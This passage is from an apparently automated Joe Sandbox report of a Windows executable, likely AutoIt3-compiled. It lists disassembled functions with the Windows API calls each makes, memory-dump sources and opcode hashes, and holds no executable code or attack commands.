                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3277943733-0
                                                                                                                                        • Opcode ID: a0513bae24dd4d58ccfa0825edfd527a9cf0ba186c8637811ef3de2af867e4e6
                                                                                                                                        • Instruction ID: 59773c6f76f7799b489ffb2e7e5a8cee92ce7d13576a4681b00e433476513d7f
                                                                                                                                        • Opcode Fuzzy Hash: a0513bae24dd4d58ccfa0825edfd527a9cf0ba186c8637811ef3de2af867e4e6
                                                                                                                                        • Instruction Fuzzy Hash: B9F090B1A40254BAE2206B61BC55FB77A6CEB09354F008421BB04E9191D6BE5E1147A8
                                                                                                                                        Function 007A9C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 007A9C7F
                                                                                                                                          • Part of subcall function 007AAD14: _memset.LIBCMT ref: 007AAD49
                                                                                                                                        • _memmove.LIBCMT ref: 007A9CA2
                                                                                                                                        • _memset.LIBCMT ref: 007A9CAF
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 007A9CBF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 48991266-0
                                                                                                                                        • Opcode ID: a864877f81b95f06fc7396fd34e41405a1d1aa16dcdba5b78df79ab7fba03fa8
                                                                                                                                        • Instruction ID: bdd1f173d23f53cbc96505078c08f0b81c10e546a9aa62c662e087303164d049
                                                                                                                                        • Opcode Fuzzy Hash: a864877f81b95f06fc7396fd34e41405a1d1aa16dcdba5b78df79ab7fba03fa8
                                                                                                                                        • Instruction Fuzzy Hash: D2F0D076201104ABCF016F54DC89A59BB29EF89351F04C065FE095E217C77AA911DBB5
                                                                                                                                        Function 007CE83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0077B5EB
                                                                                                                                          • Part of subcall function 0077B58B: SelectObject.GDI32(?,00000000), ref: 0077B5FA
                                                                                                                                          • Part of subcall function 0077B58B: BeginPath.GDI32(?), ref: 0077B611
                                                                                                                                          • Part of subcall function 0077B58B: SelectObject.GDI32(?,00000000), ref: 0077B63B
                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007CE860
                                                                                                                                        • LineTo.GDI32(00000000,?,?), ref: 007CE86D
                                                                                                                                        • EndPath.GDI32(00000000), ref: 007CE87D
                                                                                                                                        • StrokePath.GDI32(00000000), ref: 007CE88B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                        • Opcode ID: 55856e1ef8f30a6764ba44d6b863de8399083f297753b4d4e5364a045ee2b8dd
                                                                                                                                        • Instruction ID: c01bf6dcb412d80de8ab6c0726d7f9a9c0d5f7ee7b0bd532c662915131f0807c
                                                                                                                                        • Opcode Fuzzy Hash: 55856e1ef8f30a6764ba44d6b863de8399083f297753b4d4e5364a045ee2b8dd
                                                                                                                                        • Instruction Fuzzy Hash: 49F03A31002299BADB265F54AC4DFCA3F99AF0A321F14C115FE11690E1877D99628B99
                                                                                                                                        Function 0079D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0079D640
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0079D653
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0079D65A
                                                                                                                                        • AttachThreadInput.USER32(00000000), ref: 0079D661
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                        • Opcode ID: 2d3f56bf02d99e4076ed6ffc036de3856249f2ea2722ed58bbc6c75e3ac0ff8c
                                                                                                                                        • Instruction ID: 03738ce0cadc764a7a9d58f7a4cdde5a5157ce3f362783ae0d1c021c1ca76f2e
                                                                                                                                        • Opcode Fuzzy Hash: 2d3f56bf02d99e4076ed6ffc036de3856249f2ea2722ed58bbc6c75e3ac0ff8c
                                                                                                                                        • Instruction Fuzzy Hash: 19E0ED71542268BADB305FA2EC4DEDB7F6CEF5A7E1F408011B50D99060CA799D80CBA4
                                                                                                                                        Function 0079BDF8 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0079BE01
                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000), ref: 0079BE08
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0079BE15
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0079BE1C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3974789173-0
                                                                                                                                        • Opcode ID: f42c2a1e821377f982ffac922e8c3ef9596b5f1ec81014b6ff13202a0599f6b1
                                                                                                                                        • Instruction ID: d2085c5affd4b7830d42a75127e1fe856d04e2e682f04e5cd7f86db69ce61253
                                                                                                                                        • Opcode Fuzzy Hash: f42c2a1e821377f982ffac922e8c3ef9596b5f1ec81014b6ff13202a0599f6b1
                                                                                                                                        • Instruction Fuzzy Hash: CFE04F32642211DBDB201FB1AD0CB9A3BACEF58792F04C818F241DE040D66C88418765
                                                                                                                                        Function 0077B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000008), ref: 0077B0C5
                                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0077B0CF
                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0077B0E4
                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 0077B0EC
                                                                                                                                        • GetWindowDC.USER32(?,00000000), ref: 007DECFA
                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 007DED07
                                                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 007DED20
                                                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 007DED39
                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 007DED59
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 007DED64
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1946975507-0
                                                                                                                                        • Opcode ID: 378edfd78cf64cf2c42bd117de4330c5fc03307251b207e69ccd5cfa93ad0cdf
                                                                                                                                        • Instruction ID: 9ea8c89f3e1e1f4b62db0a715458c1e08336c9f2f4c6c17f2c3e9a26e56ee099
                                                                                                                                        • Opcode Fuzzy Hash: 378edfd78cf64cf2c42bd117de4330c5fc03307251b207e69ccd5cfa93ad0cdf
                                                                                                                                        • Instruction Fuzzy Hash: FDE0ED31500288AEEF326F74AC8D7983F21AB59335F14C266F6AA9C0E2D77A4D40DB11
                                                                                                                                        Function 007DC0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                        • Opcode ID: 116c537442898c2b441738376a79000e11ed351c1793e71195211f61a444afa1
                                                                                                                                        • Instruction ID: 62a383dc8cfd082e050057dbe3ab5c4c89aba463b1485af5e1b7e5c07b37756c
                                                                                                                                        • Opcode Fuzzy Hash: 116c537442898c2b441738376a79000e11ed351c1793e71195211f61a444afa1
                                                                                                                                        • Instruction Fuzzy Hash: DCE04FB1501240EFDB205F70CC8C6693BA5EB4C394F11C405FC4A8F311DABD9D818B04
                                                                                                                                        Function 007DC0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                        • Opcode ID: 435ac1555b22bf18a45038a09c443dea9d95157c09ae312196971fa0f26bc53e
                                                                                                                                        • Instruction ID: 9522f2dd6208b4f176ae2751fc8f9760f1bfe02110dc8c8f2436f844fca8127d
                                                                                                                                        • Opcode Fuzzy Hash: 435ac1555b22bf18a45038a09c443dea9d95157c09ae312196971fa0f26bc53e
                                                                                                                                        • Instruction Fuzzy Hash: 32E046B1501240EFDB206F70CC8C6693BA9EB4C3A4F11C405F94E8F211DBBD9D818B04
                                                                                                                                        Function 007E2350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: >$DEFINE
                                                                                                                                        • API String ID: 4104443479-1664449232
                                                                                                                                        • Opcode ID: 03203f76c915a5bf4ec7fc444210161157f19d369dc973ddebb2695ebad342ab
                                                                                                                                        • Instruction ID: 1f209827de96cc186bd6f567a531b0546f615f5745c54356a3cd56dc67efdb13
                                                                                                                                        • Opcode Fuzzy Hash: 03203f76c915a5bf4ec7fc444210161157f19d369dc973ddebb2695ebad342ab
                                                                                                                                        • Instruction Fuzzy Hash: 3A128075A0124ADFCF24CF59C480AADB7B5FF49314F258159E816AB351E738ED82CB90
                                                                                                                                        Function 0079EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0079ECA0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ContainedObject
                                                                                                                                        • String ID: AutoIt3GUI$Container
                                                                                                                                        • API String ID: 3565006973-3941886329
                                                                                                                                        • Opcode ID: 87ec3a6f70290f92c5ac15be837ba29b9d3b42998755c9d71edc30daf9c1836a
                                                                                                                                        • Instruction ID: 32760f135bed5bc75b65a1dc920294438a0806f2b36c02732b61e7331a37b999
                                                                                                                                        • Opcode Fuzzy Hash: 87ec3a6f70290f92c5ac15be837ba29b9d3b42998755c9d71edc30daf9c1836a
                                                                                                                                        • Instruction Fuzzy Hash: 489128B4600601DFDB14DF64D888B6ABBF9FF49710F24856DE94ACB291EB74E841CB60
                                                                                                                                        Function 007AE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00763BCF: _wcscpy.LIBCMT ref: 00763BF2
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        • __wcsnicmp.LIBCMT ref: 007AE785
                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007AE84E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                        • String ID: LPT
                                                                                                                                        • API String ID: 3222508074-1350329615
                                                                                                                                        • Opcode ID: bd35253247867ea91898159a1bfc6ed23e7ff4b7f6bb27e75795e77f0778a663
                                                                                                                                        • Instruction ID: dbdb875cd393eb9065f5a8a59dfedce8fb166b1125ade0f7e5c491513d62c340
                                                                                                                                        • Opcode Fuzzy Hash: bd35253247867ea91898159a1bfc6ed23e7ff4b7f6bb27e75795e77f0778a663
                                                                                                                                        • Instruction Fuzzy Hash: 4B619875A00215EFCB14EF94C895EADB7F4EF89310F044169F556AB391DB38AE80CB51
                                                                                                                                        Function 00761B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00761B83
                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00761B9C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                        • Opcode ID: 575f331171e12814f6c156e756458ce909e3cff87c37fcbefefa0183e6fe31b5
                                                                                                                                        • Instruction ID: 631111bcfffc2e2e4e914c84560ae565f8c10e976b75899fad96b9b3a686e759
                                                                                                                                        • Opcode Fuzzy Hash: 575f331171e12814f6c156e756458ce909e3cff87c37fcbefefa0183e6fe31b5
                                                                                                                                        • Instruction Fuzzy Hash: 2F514771408744ABE720AF14DC89BABBBECFF98394F41884DF1D8411A2EB75856DC762
                                                                                                                                        Function 007ACE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076417D: __fread_nolock.LIBCMT ref: 0076419B
                                                                                                                                        • _wcscmp.LIBCMT ref: 007ACF49
                                                                                                                                        • _wcscmp.LIBCMT ref: 007ACF5C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                                                                        • String ID: FILE
                                                                                                                                        • API String ID: 4029003684-3121273764
                                                                                                                                        • Opcode ID: ae1e2e1dd84e8253f3523386d1e03d3cb5d47f5135036355e5b69f4305ddfda6
                                                                                                                                        • Instruction ID: b23cc5e8bd2e9d3a5c8af7fb7dffd5631a68f6a14943c580b171b062e7fc1c12
                                                                                                                                        • Opcode Fuzzy Hash: ae1e2e1dd84e8253f3523386d1e03d3cb5d47f5135036355e5b69f4305ddfda6
                                                                                                                                        • Instruction Fuzzy Hash: 2C41B532A0421DBEDF11DBA4CC45FEF7BB9AF8A710F000569F501EB191D7799A448751
                                                                                                                                        Function 00789AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        • __getbuf.LIBCMT ref: 00789B8A
                                                                                                                                        • __lseeki64.LIBCMT ref: 00789BFA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
